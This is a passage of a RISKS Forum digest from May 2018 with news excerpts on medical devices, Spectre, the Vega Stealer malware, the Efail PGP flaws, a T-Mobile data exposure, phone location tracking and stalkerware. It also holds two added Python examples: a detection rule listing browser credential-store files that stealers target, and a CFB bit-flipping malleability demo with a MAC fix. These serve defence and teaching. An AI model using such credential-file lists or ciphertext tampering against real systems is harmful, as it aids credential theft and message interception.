    Re: Securing Elections (Mark E. Smith)
    Re: Dark code (Kelly Bert Manning, Richard O'Keefe)
    Fitness App Leads To Arrest For Attack On McLean Cyclist (McLean VA Patch)
    Man Is Charged With Hacking West Point and Government Websites (NYT)
    Fake Facebook accounts and online lies multiply in hours after Santa Fe
    school shooting (WashPo)
    Re: "Warning: Dangerous Fake Emails About Google Privacy Changes" (Wol)
    Re: Not So Pretty: What You Need to Know About E-Fail and the PGP Flaw
    (Yooly)
    Re: Deadly Convenience: Keyless Cars and Their Carbon Monoxide Toll (NYT)
    Re: Chinese GPS (Dimitri Maziuk)
    Re: The risk from robot weapons (Amos Shapir)
    Will You Be My Emergency Contact Takes On a Whole New Meaning (NYT)
    This fertility doctor is pushing the boundaries of human reproduction
    -- with little regulation (WashPo)
    As DIY Gene Editing Gains Popularity, `Someone Is Going to Get Hurt'
    Abridged info on RISKS (comp.risks)

    ----------------------------------------------------------------------

    Date: Tue, 22 May 2018 09:31:51 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: Boy, 9, dies in accident involving motorized room partition at his
    Fairfax school (WashPo)

    Boy, 9, dies in accident involving motorized room partition at his Fairfax school

    ------------------------------

    Date: Mon, 21 May 2018 19:30:25 -0700
    From: Richard M Stein <rms...@ieee.org>
    Subject: Don't Put That in My Heart Until You're Sure It Really Works
    (NYTimes)

    Opinion | Don’t Put That in My Heart Until You’re Sure It Really Works

    'The bar for approval of medical devices is too low. There is no reason we
    shouldn’t require, as we almost always do for drugs, a randomized
    placebo-controlled trial showing improvements in “hard” outcomes like
    mortality before approving them.

    'Unfortunately, the United States may soon make it even easier for medical
    devices to reach the patient’s bedside. The Food and Drug Administration is
    considering requiring less upfront research and instead adding increased
    oversight after a device has been introduced into the market. The argument
    is that this will spur technological innovation and perhaps help terminally
    ill patients. However, loosening regulations could extract a steep cost from
    patients and the health system.'

    Greater release frequency with less rigorous pre-production qualification
    criteria and test coverage is NOT a recipe for safe and viable embedded
    software stacks that drive these gizmos. Suppressing production defect
    escape potential is challenging. Proactive techniques that facilitate early
    and rapid software defect discovery capability -- such as continuous
    integration and high-speed regression -- are effective when capable test
    authors challenge software stack authors. Alas, industry (not just embedded
    medical implants, cars, cellphones, etc.) often economizes on qualification
    product life cycle stages. There are "too many bits" to test quickly and
    thoroughly. Governance decisions and gut judgment are sometimes applied with
    impunity.

    It appears that the FDA has gone rogue, and off-the-rails via regulatory
    capture. A business-friendly administration promoting "caveat emptor" as
    standard operating procedure also intensifies medical device implantation
    risks. Refer to "The Danger Within Us: America's Untested, Unregulated
    Medical Device Industry and One Man's Battle to Survive It" by Jeanne Lenzer
    for an exposé of the implantable medical device industry.

    If you are confronted with a "hard sell" to "go" for implantation, ask
    a few questions of your physician and the device salesperson:

    Are there any randomized control trials and non-industry funded studies that
    evaluate the candidate device's effectiveness in humans? Were the studies
    performed by a non-profit? Or a university? Does the entity reporting the
    study's results receive funding from the device manufacturer? Do any of the
    study's authors disclose industry ties? If so, a report that is published
    might possess skewed findings. Is the raw data from these studies available
    for inspection? If so, try to find a consultant to review it for you and
    render an opinion. Will the device manufacturer share their software and
    system test plans for inspection? If so, try to locate a person "skilled in
    the art of embedded software test" to evaluate the test plan, and the
    firmware test results released with the implanted device. Try to gain access
    to the manufacturer's defect tracking system to explore defect density and
    discovery rates and repair history.

    Does the device have a special mechanism to disable it, should it misbehave?
    If so, try to learn about how this is accomplished and ensure there are
    backup sources -- other physicians or facilities that possess this
    mechanism.

    How many implants have been performed in the past year? How many
    patient deaths occurred post-implantation? Never mind if the deaths
    were attributed to the device or not, find the raw count of deaths.

    For each post-implant death, was an FDA MAUDE report filed? How many of
    these reports were filed by medical practitioners? How many by the device
    manufacturer? Confront the salesperson to learn why, or if, there's a huge
    discrepancy between the number of deaths and the number of FDA MAUDE reports
    they or practitioners reported. That discrepancy is apparently a clue that
    the manufacturer is or has concealed important evidence about device
    capability or side-effects that can injure or kill you.

    Has the device been the subject of prior recalls? If so, why? Has the
    manufacturer been sued for product liability previously? Are they currently
    under litigation for liability? These questions can provide insight into
    their organization's maturity and ability to pro-actively act on
    lessons-learned.

    Is the device implantation under consideration being applied for "an
    off-label" application in your case? If so, why?

    ------------------------------

    Date: Fri, 18 May 2018 09:24:59 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "Ex-Intel security expert: This new Spectre attack can even
    reveal firmware secrets" (Liam Tung)

    Liam Tung | 18 May 2018
    Ex-Intel security expert: This new Spectre attack can even reveal firmware secrets | ZDNet

    Ex-Intel security expert: This new Spectre attack can even reveal firmware
    secrets; A new variant of Spectre can expose the contents of memory that
    normally can't be accessed by the OS kernel.

    opening text:

    Yuriy Bulygin, the former head of Intel's advanced threat team, has
    published research showing that the Spectre CPU flaws can be used to break
    into the highly privileged CPU mode on Intel x86 systems known as System
    Management Mode (SMM).

    ------------------------------

    Date: Wed, 16 May 2018 09:11:51 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "This malware is harvesting saved credentials in Chrome, Firefox
    browsers" (ZDNet)

    This malware is harvesting saved credentials in Chrome, Firefox browsers | ZDNet

    This malware is harvesting saved credentials in Chrome, Firefox browsers
    Researchers say the new Vega Stealer malware is currently being used
    in a simple campaign but has the potential to go much further.
    By Charlie Osborne for Zero Day | May 14, 2018 -- 07:42 GMT (00:42
    PDT) | Topic: Security

    selected text:

    Vega Stealer is also written in .NET and focuses on the theft of
    saved credentials and payment information in Google Chrome. These
    credentials include passwords, saved credit cards, profiles, and cookies.

    When the Firefox browser is in use, the malware harvests specific
    files -- "key3.db" "key4.db", "logins.json", and "cookies.sqlite" --
    which store various passwords and keys.

    However, Vega Stealer does not wrap up there. The malware also takes
    a screenshot of the infected machine and scans for any files on the
    system ending in .doc, .docx, .txt, .rtf, .xls, .xlsx, or .pdf for
    exfiltration.

    According to the security researchers, the malware is currently being
    utilized to target businesses in marketing, advertising, public
    relations, retail, and manufacturing.
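    A defender's way to turn the indicators above into something actionable is a rule over file-read telemetry: a non-browser process reading the Firefox credential store files the article names, especially alongside a burst of document reads, is the collection pattern described. The following is an added example, not code from the article or from the researchers it cites; the log format and the process names (including "invoice_viewer.exe") are constructed for the demo, and the Chrome file names and the list of browser processes are assumptions, not from the page.

```python
from collections import defaultdict

# Firefox profile files the article names as Vega Stealer's targets.
FIREFOX_CREDENTIAL_FILES = {"key3.db", "key4.db", "logins.json", "cookies.sqlite"}
# Chrome keeps saved passwords in "Login Data" and cards/autofill in "Web Data"
# (known Chrome profile layout; the article itself names no Chrome files).
CHROME_CREDENTIAL_FILES = {"login data", "web data"}
# Document extensions the article says the malware collects for exfiltration.
DOCUMENT_EXTENSIONS = {".doc", ".docx", ".txt", ".rtf", ".xls", ".xlsx", ".pdf"}
# Processes that legitimately read their own credential store (assumption).
BROWSER_PROCESSES = {"firefox.exe", "chrome.exe"}

# Constructed file-read telemetry, one "timestamp|process|path" per line.
# "invoice_viewer.exe" is a hypothetical name, not a real Vega Stealer artefact.
SAMPLE_EVENTS = r"""
2018-05-14T07:42:01|firefox.exe|C:\Users\alice\AppData\Roaming\Mozilla\Firefox\Profiles\abcd.default\logins.json
2018-05-14T07:42:05|svchost.exe|C:\Windows\System32\drivers\etc\hosts
2018-05-14T07:43:10|invoice_viewer.exe|C:\Users\alice\AppData\Roaming\Mozilla\Firefox\Profiles\abcd.default\key4.db
2018-05-14T07:43:10|invoice_viewer.exe|C:\Users\alice\AppData\Roaming\Mozilla\Firefox\Profiles\abcd.default\logins.json
2018-05-14T07:43:11|invoice_viewer.exe|C:\Users\alice\AppData\Roaming\Mozilla\Firefox\Profiles\abcd.default\cookies.sqlite
2018-05-14T07:43:12|invoice_viewer.exe|C:\Users\alice\Documents\q2-budget.xlsx
2018-05-14T07:43:12|invoice_viewer.exe|C:\Users\alice\Documents\contract.pdf
2018-05-14T07:43:13|invoice_viewer.exe|C:\Users\alice\Documents\notes.txt
2018-05-14T07:44:00|winword.exe|C:\Users\alice\Documents\contract.docx
"""


def parse_event(line):
    """Split one telemetry line into (timestamp, process, file name, extension),
    normalising case so the matching below is case-insensitive."""
    ts, process, path = line.split("|", 2)
    name = path.replace("/", "\\").rsplit("\\", 1)[-1]
    dot = name.rfind(".")
    ext = name[dot:].lower() if dot >= 0 else ""
    return ts, process.lower(), name.lower(), ext


def find_credential_harvesting(events_text, doc_threshold=2):
    """Flag any non-browser process that reads a browser credential store.
    Reading several user documents in the same telemetry window raises the
    severity, matching the collection pattern the article describes."""
    per_process = defaultdict(lambda: {"cred": set(), "docs": 0})
    for line in events_text.splitlines():
        if not line.strip():
            continue
        _, process, name, ext = parse_event(line)
        if name in FIREFOX_CREDENTIAL_FILES | CHROME_CREDENTIAL_FILES:
            if process not in BROWSER_PROCESSES:
                per_process[process]["cred"].add(name)
        elif ext in DOCUMENT_EXTENSIONS:
            per_process[process]["docs"] += 1

    alerts = []
    for process, seen in per_process.items():
        if not seen["cred"]:
            continue  # document reads alone are normal user activity
        alerts.append({
            "process": process,
            "severity": "high" if seen["docs"] >= doc_threshold else "medium",
            "credential_files": sorted(seen["cred"]),
            "document_reads": seen["docs"],
        })
    return alerts


if __name__ == "__main__":
    for alert in find_credential_harvesting(SAMPLE_EVENTS):
        print(alert)
```

    The rule deliberately ignores the browser's own reads of its profile, so the signal is "who else is reading these files", which is cheap to evaluate on EDR or Sysmon-style file events and survives the malware being renamed.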

    ------------------------------

    Date: Wed, 23 May 2018 18:07:03 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: Student awarded $36,000 for remote execution flaw in Google App Engine
    (Charlie Osborne)

    Charlie Osborne for Zero Day | 22 May 2018
    Student awarded $36,000 for remote execution flaw in Google App Engine | ZDNet
    The discovery was made by a university student who was not aware of
    how dangerous the vulnerability was.

    opening text:

    Google has awarded a young cybersecurity researcher $36,337 for disclosing a
    severe vulnerability in the Google App Engine.

    The 18-year-old student from Uruguay's University of the Republic discovered
    a critical remote code execution (RCE) bug in the system, which is a
    framework and cloud platform used for the hosting and development of web
    applications in Google data centers.

    ------------------------------

    Date: Fri, 18 May 2018 09:05:54 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "This cryptocurrency phishing attack uses new trick to drain
    wallets" (Danny Palmer)

    Danny Palmer | 17 May 2018
    This cryptocurrency phishing attack uses new trick to drain wallets | ZDNet

    This cryptocurrency phishing attack uses new trick to drain wallets
    Campaign uses automation to empty cryptocurrency wallets and produce
    lucrative returns.

    ... the phishing campaign mimics the front end of the MyEtherWallet website
    for the purpose of stealing credentials, while also deploying what the
    authors call an "automated transfer system" to process the details captured
    by the fake page and transfer funds.

    The attack injects scripts into active web sessions and silently and
    invisibly executes bank transfers just seconds after the user logs
    into their cryptocurrency account.

    Researchers note that MyEtherWallet is an appealing target for attackers
    because it is simple to use, but its lack of security compared to other
    banks and exchanges make it a prominent target for attack.

    After that, the crooks look to drain accounts when the victim decrypts their
    wallet. The scam uses scripts which automatically create the fund transfer
    by pressing the buttons like a legitimate user would, all while the activity
    remains hidden -- it's the first time an attack has been seen to use this
    automated tactic.

    ------------------------------

    Date: Wed, 16 May 2018 16:47:10 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Ex-JPMorgan Chase Blockchain Duo Unveil New Startup Clovyr (Fortune)

    Baldet, who most recently served as the bank’s blockchain program lead, is
    cofounding a new startup, Clovyr, that aims to help consumers, developers,
    and businesses explore the nascent, albeit burgeoning, world of
    blockchain-based, decentralized technologies, she tells Fortune. She is
    joined by Nielsen, former lead developer of Quorum, a JPMorgan Chase-built
    blockchain for business, who will serve as the concern’s chief technologist.

    Baldet unveiled a Clovyr demo at the Consensus conference in Manhattan on
    Monday afternoon. The company is in the process of fundraising.

    Clovyr's product, now under development, is slated to take the form of
    something akin to an app store, where people and businesses can experiment
    with a multitude of decentralized apps and services, developer toolsets, and
    underlying distributed ledgers. The cofounders envision the platform serving
    as a neutral ground, offering a browser-like dashboard for the
    blockchain-curious, through which Clovyr can provide support and other
    services to customers according to their needs.

    Ex-JPMorgan Chase Blockchain Duo Unveil New Startup

    Just what consumers need. What could go wrong? Also, what's with "Clovyr"
    name?

    ------------------------------

    Date: Thu, 17 May 2018 16:48:50 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: ICE abandons its dream of ‘extreme vetting’ software that could
    predict whether a foreign visitor would become a terrorist (WashPo)

    Immigration officials originally wanted artificial intelligence that could
    continuously track foreign visitors' social media. They're giving the job to
    humans instead.

    ICE just abandoned its dream of ‘extreme vetting’ software that could predict whether a foreign visitor would become a terrorist

    ------------------------------

    Date: Thu, 17 May 2018 15:10:11 -0600
    From: "Keith Medcalf" <kmed...@dessus.com>
    Subject: E-Mail Clients are Insecure, PGP and S/MIME 100% secure

    There is no "security" problem with either PGP or S/MIME encrypted and
    signed messages. The problem is, as it has been since the introduction of
    the ability to embed executable code into e-mail messages (aka, Web Pages
    and Rich Text via SMTP), the shoddy and useless security state of almost all
    e-mail clients.

    If you turn off the [expletive deleted] (HTML code execution, etc) then
    there is no problem. In other words, the only problem that exists is that
    which you created yourself. So if you do something utterly stupid, you
    deserve whatever you get in return.

    ------------------------------

    Date: Mon, 14 May 2018 15:06:45 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: E-mail Encryption Tools Are No Longer Safe, Researchers Say (Fortune)

    Throughout the many arguments over encrypted communications, there has been
    at least one constant: the venerable tools for strong email encryption are
    trustworthy. That may no longer be true.

    On Tuesday, well-credentialed cybersecurity researchers will detail what
    they call critical vulnerabilities in widely-used tools for applying PGP/GPG
    and S/MIME encryption. According to Sebastian Schinzel, a professor at the
    Münster University of Applied Sciences in Germany, the flaws could reveal
    the plaintext that email encryption is supposed to cover up -- in both
    current and old emails.

    The researchers are advising everyone to temporarily stop using plugins for
    mail clients like Microsoft Outlook and Apple Mail that automatically
    encrypt and decrypt emails -- at least until someone figures out how to
    remedy the situation. Instead, experts say, people should switch to tools
    like Signal, the encrypted messaging app that's bankrolled by WhatsApp
    co-founder Brian Acton.

    Stop Using Common Email Encryption Tools Immediately, Researchers Warn

    ------------------------------

    Date: Tue, May 15, 2018 at 12:38 AM
    From: Dewayne Hendricks <dew...@warpspeed.com>
    Subject: Not So Pretty: What You Need to Know About E-Fail and the PGP Flaw
    (EFF)

    Erica Portnoy, Danny O'Brien, and Nate Cardozo, EFF, 14 May 2018
    Not So Pretty: What You Need to Know About E-Fail and the PGP Flaw

    Don't panic! But you should stop using PGP for encrypted email and switch
    to a different secure communications method for now.

    A group of researchers released a paper today that describes a new class of
    serious vulnerabilities in PGP (including GPG), the most popular email
    encryption standard. The new paper includes a proof-of-concept exploit that
    can allow an attacker to use the victim's own email client to decrypt
    previously acquired messages and return the decrypted content to the
    attacker without alerting the victim. The proof of concept is only one
    implementation of this new type of attack, and variants may follow in the
    coming days.

    Because of the straightforward nature of the proof of concept, the severity
    of these security vulnerabilities, the range of email clients and plugins
    affected, and the high level of protection that PGP users need and expect,
    EFF is advising PGP users to pause in their use of the tool and seek other
    modes of secure end-to-end communication for now.

    Because we are awaiting the response from the security community of the
    flaws highlighted in the paper, we recommend that for now you uninstall or
    disable your PGP email plug-in. These steps are intended as a temporary,
    conservative stopgap until the immediate risk of the exploit has passed and
    been mitigated against by the wider community. There may be simpler
    mitigations available soon, as vendors and commentators develop narrower
    solutions, but this is the safest stance to take for now. Because sending
    PGP-encrypted emails to an unpatched client will create adverse ecosystem
    incentives to open incoming emails, any of which could be maliciously
    crafted to expose ciphertext to attackers.

    While you may not be directly affected, the other participants in your
    encrypted conversations are likely to be. For this attack, it isn't
    important whether the sender or the receiver of the original secret message
    is targeted. This is because a PGP message is encrypted to both of their
    keys.

    At EFF, we have relied on PGP extensively both internally and to secure
    much of our external-facing email communications. Because of the severity
    of the vulnerabilities disclosed today, we are temporarily dialing down our
    use of PGP for both internal and external email.

    Our recommendations may change as new information becomes available, and we
    will update this post when that happens.

    How The Vulnerabilities Work

    PGP, which stands for Pretty Good Privacy, was first released nearly 27
    years ago by Phil Zimmermann. Extraordinarily innovative for the time, PGP
    transformed the level of privacy protection available for digital
    communications, and has provided tech-savvy users with the ability to
    encrypt files and send secure email to people they've never met. Its strong
    security has protected the messages of journalists, whistleblowers,
    dissidents, and human rights defenders for decades. While PGP is now a
    privately-owned tool, an open source implementation called GNU Privacy
    Guard (GPG) has been widely adopted by the security community in a number
    of contexts, and is described in the OpenPGP Internet standards document.

    The paper describes a series of vulnerabilities that all have in common
    their ability to expose email contents to an attacker when the target opens
    a maliciously crafted email sent to them by the attacker. In these attacks,
    the attacker has obtained a copy of an encrypted message, but was unable to
    decrypt it.

    The first attack is a direct exfiltration attack that is caused by the
    details of how mail clients choose to display HTML to the user. The
    attacker crafts a message that includes the old encrypted message. The
    new message is constructed in such a way that the mail software
    displays the entire decrypted message -- including the captured
    ciphertext -- as unencrypted text. Then the email client's HTML parser
    immediately sends or exfiltrates the decrypted message to a server
    that the attacker controls.

    The second attack abuses the underspecification of certain details in the
    OpenPGP standard to exfiltrate email contents to the attacker by modifying
    a previously captured ciphertext. Here are some technical details of the
    vulnerability, in plain-as-possible language:

    When you encrypt a message to someone else, it scrambles the information
    into ciphertext such that only the recipient can transform it back into
    readable plaintext. But with some encryption algorithms, an attacker can
    modify the ciphertext, and the rest of the message will still decrypt back
    into the correct plaintext. This property is called malleability. This
    means that they can change the message that you read, even if they can't
    read it themselves.

    To address the problem of malleability, modern encryption algorithms add
    mechanisms to ensure integrity, or the property that assures the recipient
    that the message hasn't been tampered with. But the OpenPGP standard says
    that it's ok to send a message that doesn't come with an integrity check.
    And worse, even if the message does come with an integrity check, there are
    known ways to strip off that check. Plus, the standard doesn't say what to
    do when the check fails, so some email clients just tell you that the check
    failed, but show you the message anyway. ...

    http://dewaynenet.wordpress.com/feed/
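    The malleability and integrity-check points in the EFF post above can be seen concretely in a few dozen lines. The following is an added example, not code from EFF, the Efail researchers or any OpenPGP implementation: it implements standard CFB mode (the mode OpenPGP uses) over a stand-in block function built from HMAC-SHA256 instead of AES, shows that flipping one ciphertext bit flips the same plaintext bit in that block and garbles only the next one, and then adds an encrypt-then-MAC tag (an assumption standing in for OpenPGP's MDC, which is a plaintext hash rather than a MAC) whose failure a strict client treats as "release nothing". The `enforce_integrity=False` path reproduces the "warn but show the message anyway" client behaviour the post criticises.

```python
import hashlib
import hmac
import os

BLOCK = 16      # block size of the toy cipher, in bytes
TAG_LEN = 32    # HMAC-SHA256 tag length


def prf_block(key, block):
    """Forward block-cipher function.  CFB only ever runs the cipher in the
    forward direction, so a PRF (HMAC-SHA256 truncated to BLOCK bytes) stands
    in for AES here.  Constructed for the demo; not OpenPGP's cipher."""
    return hmac.new(key, block, hashlib.sha256).digest()[:BLOCK]


def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def cfb_encrypt(key, iv, plaintext):
    """Standard CFB: C_i = P_i XOR E(C_{i-1}), with C_{-1} = IV."""
    out, prev = bytearray(), iv
    for i in range(0, len(plaintext), BLOCK):
        c = _xor(plaintext[i:i + BLOCK], prf_block(key, prev))
        out += c
        prev = c
    return bytes(out)


def cfb_decrypt(key, iv, ciphertext):
    """P_i = C_i XOR E(C_{i-1}): each keystream block depends only on the
    previous *ciphertext* block, which is what makes the mode malleable."""
    out, prev = bytearray(), iv
    for i in range(0, len(ciphertext), BLOCK):
        c = ciphertext[i:i + BLOCK]
        out += _xor(c, prf_block(key, prev))
        prev = c
    return bytes(out)


def flip_bits(data, offset, mask):
    """Copy of data with one byte XORed by mask."""
    buf = bytearray(data)
    buf[offset] ^= mask
    return bytes(buf)


def malleability_demo(key, iv, plaintext):
    """Flip one bit in ciphertext block 0 and decrypt with no integrity check.
    In CFB the same bit flips in plaintext block 0, block 1 decrypts to
    garbage, and every later block is untouched."""
    tampered = flip_bits(cfb_encrypt(key, iv, plaintext), 0, 0x20)
    return cfb_decrypt(key, iv, tampered)


def _subkeys(key):
    # Separate encryption and MAC keys derived from one master key.
    return (hmac.new(key, b"enc", hashlib.sha256).digest(),
            hmac.new(key, b"mac", hashlib.sha256).digest())


def seal(key, plaintext, iv=None):
    """Encrypt-then-MAC: IV || CFB ciphertext || HMAC over both."""
    enc_key, mac_key = _subkeys(key)
    iv = iv if iv is not None else os.urandom(BLOCK)
    body = iv + cfb_encrypt(enc_key, iv, plaintext)
    return body + hmac.new(mac_key, body, hashlib.sha256).digest()


def tag_valid(key, blob):
    _, mac_key = _subkeys(key)
    body, tag = blob[:-TAG_LEN], blob[-TAG_LEN:]
    expected = hmac.new(mac_key, body, hashlib.sha256).digest()
    return hmac.compare_digest(tag, expected)


def open_sealed(key, blob, enforce_integrity=True):
    """Strict client: a failed tag means no plaintext is released at all.
    enforce_integrity=False is the 'warn but display anyway' behaviour."""
    if enforce_integrity and not tag_valid(key, blob):
        raise ValueError("integrity check failed; refusing to release plaintext")
    enc_key, _ = _subkeys(key)
    return cfb_decrypt(enc_key, blob[:BLOCK], blob[BLOCK:-TAG_LEN])


if __name__ == "__main__":
    key, iv = b"\x01" * 32, b"\x02" * BLOCK
    msg = b"the quick brown fox jumps over the lazy dog"
    print(malleability_demo(key, iv, msg))          # block 0 edited, block 1 garbled
    bad = flip_bits(seal(key, msg, iv), BLOCK, 0x20)
    print(tag_valid(key, bad))                      # False: tampering is detected
```

    The lesson for a client author is in `open_sealed`: the check is only worth having if a failure stops the plaintext from reaching the renderer, since a displayed-but-flagged message is exactly what the exfiltration attacks described above rely on.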

    ------------------------------

    Date: Thu, 24 May 2018 18:24:24 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "T-Mobile bug let anyone see any customer's account details"
    (Zack Whittaker)

    Zack Whittaker for Zero Day | 24 May 2018

    T-Mobile security lapse let anyone see customer account details

    T-Mobile bug let anyone see any customer's account details
    Exclusive: The exposed lookup tool let anyone run a customer's phone number
    -- and obtain their home address and account PIN, used to contact phone
    support.

    selected text:

    A bug in T-Mobile's website let anyone access the personal account details
    of any customer with just their cell phone number.

    The flaw, since fixed, could have been exploited by anyone who knew where to
    look -- a little-known T-Mobile subdomain that staff use as a customer care
    portal to access the company's internal tools.

    Although the API is understood to be used by T-Mobile staff to look up
    account details, it wasn't protected with a password and could be easily
    used by anyone.

    The returned data included a customer's full name, postal address, billing
    account number, and in some cases information about tax identification
    numbers. The data also included customers' account information, such as if
    a bill is past-due or if the customer had their service suspended.

    The data also included references to account PINs used by customers as a
    security question when contacting phone support. Anyone could use that
    information to hijack accounts.

    [Gene also contributed a previous item from Zack Whittaker on 17 May
    on the same subject:
    A bug in cell phone tracking firm's website leaked millions of Americans' real-time locations
    I think the more recent one suffices here. PGN]

    ------------------------------

    Date: Fri, 18 May 2018 09:27:33 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "Senator wants to know how police can locate any phone in
    seconds without a warrant" (Zach Whittaker)

    Zack Whittaker for Zero Day | May 11, 2018
    Police can track any phone in the US in seconds — without a warrant

    Senator wants to know how police can locate any phone in seconds without a
    warrant. Real-time location data was accessible by police under "the legal
    equivalent of a pinky promise," said a senator who is demanding that the FCC
    investigate why a company, contracted to monitor calls of prison inmates,
    also allows police to track phones of anyone in the US without a warrant.

    The bombshell story in *The New York Times* revealed Securus, a Texas-based
    prison technology company, could track any phone "within seconds" by
    obtaining data from cellular giants -- including AT&T, Sprint, T-Mobile, and
    Verizon -- typically reserved for marketers.

    ------------------------------

    Date: Fri, 18 May 2018 09:29:13 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "US cell carriers are selling access to your real-time phone
    location data" (Zach Whittaker)

    Zack Whittaker, Zero Day, 14 May 2018
    US cell carriers are selling access to your real-time phone location data

    US cell carriers are selling access to your real-time phone location data
    The company embroiled in a privacy row has "direct connections" to all major
    US wireless carriers, including AT&T, Verizon, T-Mobile, and Sprint -- and
    Canadian cell networks, too.

    Four of the largest cell giants in the US are selling your real-time
    location data to a company that you've probably never heard about before.

    In case you missed it, a senator last week sent a letter demanding the
    Federal Communications Commission (FCC) investigate why Securus, a prison
    technology company, can track any phone "within seconds" by using data
    obtained from the country's largest cell giants, including AT&T, Verizon,
    T-Mobile, and Sprint, through an intermediary, LocationSmart.

    ------------------------------

    Date: Sat, 19 May 2018 07:36:23 -0700
    From: Richard M Stein <rms...@ieee.org>
    Subject: Hundreds of Apps Can Empower Stalkers to Track Their Victims
    (The New York Times)

    Hundreds of Apps Can Empower Stalkers to Track Their Victims

    'KidGuard is a phone app that markets itself as a tool for keeping tabs on
    children. But it has also promoted its surveillance for other purposes and
    run blog posts with headlines like *How to Read Deleted Texts on Your
    Lover's Phone.*

    'A similar app, mSpy, offered advice to a woman on secretly monitoring her
    husband. Still another, Spyzie, ran ads on Google alongside results for
    search terms like *catch cheating girlfriend iPhone*.

    'As digital tools that gather cellphone data for tracking children,
    friends or lost phones have multiplied in recent years, so have the
    options for people who abuse the technology to track others without
    consent.'

    Surveillance capitalism is booming. These apps are e^(to the creepy).

    ------------------------------

    Date: Fri, 18 May 2018 15:06:20 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "Voice squatting attacks: Hacks turn Amazon Alexa, Google Home
    into secret eavesdroppers" (CSO Online)

    Hacks turn Amazon Alexa and Google Home into secret eavesdroppers

    Voice squatting attacks: Hacks turn Amazon Alexa, Google Home into secret
    eavesdroppers. Researchers devise two new attacks -- voice squatting
    and voice masquerading -- on Amazon Alexa and Google Home, allowing
    adversaries to steal personal information or silently eavesdrop.

    Ms. Smith, CSO | 17 May 2018

    Ms. Smith (not her real name) is a freelance writer and programmer with a
    special and somewhat personal interest in IT privacy and security issues.

    opening text:

    Oh, goody, Amazon Alexa and/or Google Home could be hit with remote,
    large-scale "voice squatting" and "voice masquerading" attacks to steal
    sensitive user information or eavesdrop on conversations.

    ------------------------------

    Date: Fri, 18 May 2018 17:56:12 -0700
    From: Richard M Stein <rms...@ieee.org>
    Subject: So, Umm, Google Duplex's Chatter Is Not Quite Human
    (Scientific American)

    So, Umm, Google Duplex's Chatter Is Not Quite Human

    "Google’s Duplex voice assistant drew applause last week at the company’s
    annual I/O developer conference after CEO Sundar Pichai demonstrated the
    artificially intelligent technology autonomously booking a hair salon
    appointment and a restaurant reservation, apparently fooling the people
    who took the calls. But enthusiasm has since been tempered with unease
    over the ethics of a computer making phone calls under the guise of being
    human. Such a mixed reception has become increasingly common for Google,
    Amazon, Facebook and other tech companies as they push AI's boundaries in
    ways that do not always seem to consider consumer privacy or safety
    concerns."

    ------------------------------

    Date: Fri, 18 May 2018 08:27:18 -0700
    From: Lauren Weinstein <lau...@vortex.com>
    Subject: Henry Kissinger Is Scared of 'Unstable' Artificial Intelligence
    (The Wrap)

    via NNSquad
    http://www.thewrap.com/henry-kissinger-is-scared-of-unstable-artificial-intelligence/

    The former U.S. secretary of state is warning against the threat of
    "unstable" artificial intelligence in a new essay in The Atlantic --
    fearing the rapid rise of machines could lead to questions humanity is not
    ready to tackle.

    ------------------------------

    Date: Sat, 19 May 2018 17:56:25 -0700
    From: Monty Solomon <mo...@roscom.com>
    Subject: Service Meant to Monitor Inmates' Calls Could Track You, Too (NYT)

    http://www.nytimes.com/2018/05/10/technology/cellphone-tracking-law-enforcement.html

    A company catering to law enforcement and corrections officers has raised
    privacy concerns with a product that can locate almost anyone's cellphone
    across the United States.

    ------------------------------

    Date: Fri, 18 May 2018 17:53:59 -0700
    From: Richard M Stein <rms...@ieee.org>
    Subject: Gunshot Sensors Pinpoint Destructive Fish Bombs (SciAm)

    http://www.scientificamerican.com/article/gunshot-sensors-pinpoint-destructive-fish-bombs/

    "Rogue fishers around the world toss explosives into the sea and scoop up
    bucketloads of stunned or dead fish, an illegal practice in many nations
    that can destroy coral reefs and wreak havoc on marine biodiversity.
    Catching perpetrators amid the vastness of the ocean has long proved
    almost impossible, but researchers working in Malaysia have now adapted
    acoustic sensors—originally used to locate urban gunfire—to pinpoint these
    marine blasts within tens of meters."

    Example of dual-use technology for public and environmental safety
    maintenance.

    ------------------------------

    Date: Mon, 21 May 2018 12:04:35 -0700
    From: Lauren Weinstein <lau...@vortex.com>
    Subject: Most GDPR emails unnecessary and some illegal, say experts
    (The Guardian)

    NNSquad
    http://www.theguardian.com/technolo...cessary-and-in-some-cases-illegal-say-experts

    The vast majority of emails flooding inboxes across Europe from companies
    asking for consent to keep recipients on their mailing list are
    unnecessary and some may be illegal, privacy experts have said, as new
    rules over data privacy come into force at the end of this week.

    AND EVEN WORSE: "Warning: New European Privacy Law Has Become a
    Jackpot for Internet Crooks" -

    http://lauren.vortex.com/2018/05/01...-law-has-become-a-jackpot-for-internet-crooks

    ------------------------------

    Date: Wed, 23 May 2018 13:58:50 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: The Pentagon Has a Big Plan to Solve Identity Verification in
    Two Years (Defense One)

    The plan grew out of efforts to modernize the Defense Department's ID cards.

    The Defense Department is funding a project that officials say could
    revolutionize the way companies, federal agencies and the military itself
    verify that people are who they say they are and it could be available in
    most commercial smartphones within two years.

    The technology, which will be embedded in smartphones’ hardware, will
    analyze a variety of identifiers that are unique to an individual, such as
    the hand pressure and wrist tension when the person holds a smartphone and
    the person’s peculiar gait while walking, said Steve Wallace, technical
    director at the Defense Information Systems Agency.

    Organizations that use the tool can combine those identifiers to give the
    phone holder a “risk score,” Wallace said. If the risk score is low enough,
    the organization can presume the person is who she says she is and grant her
    access to sensitive files on the phone or on a connected computer or grant
    her access to a secure facility. If the score’s too high, she’ll be locked
    out.

    http://www.defenseone.com/technolog...solve-identity-verification-two-years/148280/

    ------------------------------

    Date: Thu, 24 May 2018 17:41:32 PDT
    From: "Peter G. Neumann" <neu...@csl.sri.com>
    Subject: Unplug Your Echo! (Ars Technica)

